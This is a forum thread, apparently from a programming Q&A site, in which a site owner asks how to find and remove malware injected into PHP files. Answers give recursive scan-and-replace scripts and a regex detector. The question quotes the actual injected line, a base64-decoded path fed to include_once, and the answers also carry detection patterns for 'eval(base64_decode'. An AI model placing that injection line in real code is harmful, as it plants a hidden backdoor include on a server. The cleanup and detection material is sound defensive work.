
Code to search for a specific code in any file in a directory and subdirectory

OK, I am pretty new to PHP but I know it can read directories and files.

I have been struggling with a malware problem on one of our sites and I need to write a script to search for it on my host space.

The code the hackers are putting in the files is

*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>

I have no idea what this is, but Google blocks my site when this shows up.

I have to download all the files, then search for it in Dreamweaver, replace this crap with a space and put it back.

I need a script to detect this before Google does.

If anyone can give me some pointers it will be great.

I am sure this is a problem that everyone will face now or later.

Pure PHP solution that will find and replace the string you provided. Alternatively, you can just obtain files that have been modified. Note: if you use this code, there is NO UNDO option, you're using it at your own risk.

<?php
$dir = '/your_dir/';
// Exact injected string (single-quoted, so $DUOIEK is not interpolated)
$searchstring = '*/ $DUOIEK = base64_decode("L2hvbWUvdXNlcnMvd2ViL2IxNjQzL3NsLnRoZWNoZXNzL3B1YmxpY19odG1sL01lZGNvdXJ0QmFja3Vwb2N0MjAwNy9NZWRjb3VydEJhY2t1cG9jdDIwMDctMi9iMmIgY3VzdG9tZXIvQnViYmxlcG9zdCBCYWNrIHVwL3B1YmxpY19odG1sL0JhY2t1cHMvTWVkaWFzdWZhY2UgMjAwNS9IZWxwIGFuZCBkb2N1bWVudGF0aW9uL2phdmEgYXBpL0phdmFBUEkvY29tL21lZGlhc3VyZmFjZS9kYXRhdHlwZXMvc2VhcmNoaW5nL2NsYXNzLXVzZS90c2Rlby5waHA="); @include_once $DUOIEK;/* */?>';

$infected = array();
// SKIP_DOTS keeps the "." and ".." entries out of the loop
$iterator = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS);

foreach (new RecursiveIteratorIterator($iterator) as $filename => $cur) {
    if (!$cur->isFile()) {
        continue;
    }
    $contents = file_get_contents($filename);

    // Skip unreadable files and files that do not contain the injected code
    if ($contents === false || strpos($contents, $searchstring) === false) {
        continue;
    }
    $infected[] = $filename; // gives you an array of paths to files that contain the injected code.

    // Search and replace (no undo). Remove these two lines to only list the files instead.
    $contents = str_replace($searchstring, ' ', $contents);
    file_put_contents($filename, $contents);
}

print_r($infected);

You can run the script either from a browser or the command line. I'm not saying this is the best option though.

Download all with your FTP and run a find & replace for a complete directory (Dreamweaver supports complete directories). I've had this problem once as well, you might wanna look for JavaScript hacks in your code as well, they tend to do JavaScript includes also.

The hack code tries to include this file:

/home/users/web/b1643/sl.thechess/public_html/MedcourtBackupoct2007/MedcourtBackupoct2007-2/b2b customer/Bubblepost Back up/public_html/Backups/Mediasuface 2005/Help and documentation/java api/JavaAPI/com/mediasurface/datatypes/searching/class-use/tsdeo.php

What this is? I don't know, but that's what it's trying to do. So you might consider this hack to be done from inside the server you're hosted on I think.

If you have SSH access you can use a command like this; just replace "eval(base64_decode" with "base64_decode".

If not you will want to write a script that does a recursive loop through all of your files with readdir and then use some strpos magic to detect "base64_decode".

And if you're really having problems I would recommend a 3rd party service like Sucuri.

Good luck!
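
A read-only variant of the recursive scan described in the answers above, added here as an example and not code from any poster: instead of one exact string it matches the shape of the injection (a variable set from base64_decode and then included), so it still matches if the variable name or payload differs, and it reports the decoded path. The function name find_base64_includes, the regex, the 5 MB size cut-off and the sample files are assumptions constructed for illustration.

```php
<?php
// Added example (not from the thread): read-only scan, nothing is modified.
function find_base64_includes(string $dir): array
{
    // Matches: $VAR = base64_decode("..."); then include/require of the same $VAR.
    $re = '/(\$\w+)\s*=\s*base64_decode\(\s*["\']([A-Za-z0-9+\/=]+)["\']\s*\)\s*;'
        . '\s*@?\s*(?:include|require)(?:_once)?\s*\(?\s*\1\b/i';
    $hits = [];
    $files = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($files as $path => $info) {
        // Regular readable files only; 5 MB size cut-off is an assumed limit.
        if (!$info->isFile() || !$info->isReadable() || $info->getSize() > 5 * 1024 * 1024) {
            continue;
        }
        $contents = file_get_contents($path);
        // Cheap substring pre-filter before running the regex.
        if ($contents === false || stripos($contents, 'base64_decode') === false) {
            continue;
        }
        preg_match_all($re, $contents, $m, PREG_SET_ORDER | PREG_OFFSET_CAPTURE);
        foreach ($m as $match) {
            $hits[] = [
                'file'    => $path,
                'line'    => substr_count(substr($contents, 0, $match[0][1]), "\n") + 1,
                // Path the injected code would include, decoded for the report only.
                'decoded' => base64_decode($match[2][0], true),
            ];
        }
    }
    return $hits;
}

// Constructed sample tree so the example runs offline.
$root = sys_get_temp_dir() . '/scan_demo_' . getmypid();
mkdir("$root/sub", 0700, true);
// Legitimate use of base64_decode: must not be reported.
file_put_contents("$root/clean.php", "<?php echo base64_decode('aGVsbG8=');\n");
// Same shape as the injection in the question, with a harmless constructed payload.
file_put_contents(
    "$root/sub/page.php",
    "<?php echo 'hi';\n/* */ \$ABCDEF = base64_decode(\"L3RtcC9leGFtcGxlLnBocA==\"); @include_once \$ABCDEF;/* */?>\n"
);

foreach (find_base64_includes($root) as $hit) {
    printf("%s:%d would include %s\n", $hit['file'], $hit['line'], $hit['decoded']);
}
```

Point find_base64_includes() at the web root instead of the sample tree to list candidate files without changing them.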






